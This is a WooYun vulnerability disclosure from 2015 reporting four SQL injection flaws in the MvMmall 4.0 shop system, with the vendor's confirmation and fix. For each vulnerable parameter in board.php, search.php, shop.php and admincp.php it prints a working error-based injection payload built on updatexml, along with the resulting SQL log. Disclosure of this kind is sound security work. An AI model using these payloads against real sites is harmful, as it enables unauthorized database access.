当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107074

漏洞标题:MvMmall4.0 四处sql注入漏洞

相关厂商:mvmmall.com

漏洞作者: 浅蓝

提交时间:2015-04-10 15:10

修复时间:2015-07-09 15:18

公开时间:2015-07-09 15:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-10: 细节已通知厂商并且等待厂商处理中
2015-04-10: 厂商已经确认,细节仅向厂商公开
2015-04-13: 细节向第三方安全合作伙伴开放
2015-06-04: 细节向核心白帽子及相关领域专家公开
2015-06-14: 细节向普通白帽子公开
2015-06-24: 细节向实习白帽子公开
2015-07-09: 细节向公众公开

简要描述:

http://www.mvmmall.com/down.html 下载地址。。。
php代码被加密了。。。好坑爹

详细说明:

。。被加密了 无法审计。。。 只好黑盒了
第一处 board.php
提交POST数据

http://localhost/free/board.php
ps_search=xxx'or updatexml(1,concat(0x7e,(user())),0) or'


2015-4-10 14:20	SELECT COUNT(*) AS cnt FROM mvm_bmain WHERE supplier_id='0'  AND board_subject LIKE '%xxx'or updatexml(1,concat(0x7e,(user())),0) or'%'  LIMIT 1


ps_search没有被转义直接带入数据库

~EM9)N}$}7}I95K_@1FHQT3.png


第二处 /search.php
之前有人在乌云报告过search.php的注入
WooYun: mvmmall网店商城系统注入漏洞 他是get提交的 和我这不一样

http://localhost/free/search.php
ps_search=xxx'or updatexml(1,concat(0x7e,(database())),0) or'&sellshow=1


_15F%GQ6K76K8EY@6Y({U0D.png


第三处 shop.php

http://localhost/free/shop.php
shop_name=xxx'or updatexml(1,concat(0x7e,(user())),0) or'


4$ZB~O_[YIQJX58W}CDB3NS.png


第四处 admincp.php
http://localhost/free/admincp.php?module=payment&action=del&uid=xxx'or updatexml(1,concat(0x7e,(user())),0) or'
这个需要登录后台

}2[F5P[MTALD]S[{N2{BEVG.png

漏洞证明:

。。被加密了 无法审计。。。 只好黑盒了
第一处 board.php
提交POST数据

http://localhost/free/board.php
ps_search=xxx'or updatexml(1,concat(0x7e,(user())),0) or'


2015-4-10 14:20	SELECT COUNT(*) AS cnt FROM mvm_bmain WHERE supplier_id='0'  AND board_subject LIKE '%xxx'or updatexml(1,concat(0x7e,(user())),0) or'%'  LIMIT 1


ps_search没有被转义直接带入数据库

~EM9)N}$}7}I95K_@1FHQT3.png


第二处 /search.php
之前有人在乌云报告过search.php的注入
WooYun: mvmmall网店商城系统注入漏洞 他是get提交的 和我这不一样

http://localhost/free/search.php
ps_search=xxx'or updatexml(1,concat(0x7e,(database())),0) or'&sellshow=1


_15F%GQ6K76K8EY@6Y({U0D.png


第三处 shop.php

http://localhost/free/shop.php
shop_name=xxx'or updatexml(1,concat(0x7e,(user())),0) or'


4$ZB~O_[YIQJX58W}CDB3NS.png


第四处 admincp.php
http://localhost/free/admincp.php?module=payment&action=del&uid=xxx'or updatexml(1,concat(0x7e,(user())),0) or'
这个需要登录后台

}2[F5P[MTALD]S[{N2{BEVG.png

修复方案:

转义

版权声明:转载请注明来源 浅蓝@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-04-10 15:17

厂商回复:

谢谢支持,这个漏洞官网已修复,请向客服人员索要新程序。免费版本的下载将在本周内完成更新

最新状态:

2015-04-10:免费版本已更新


漏洞评价:

评论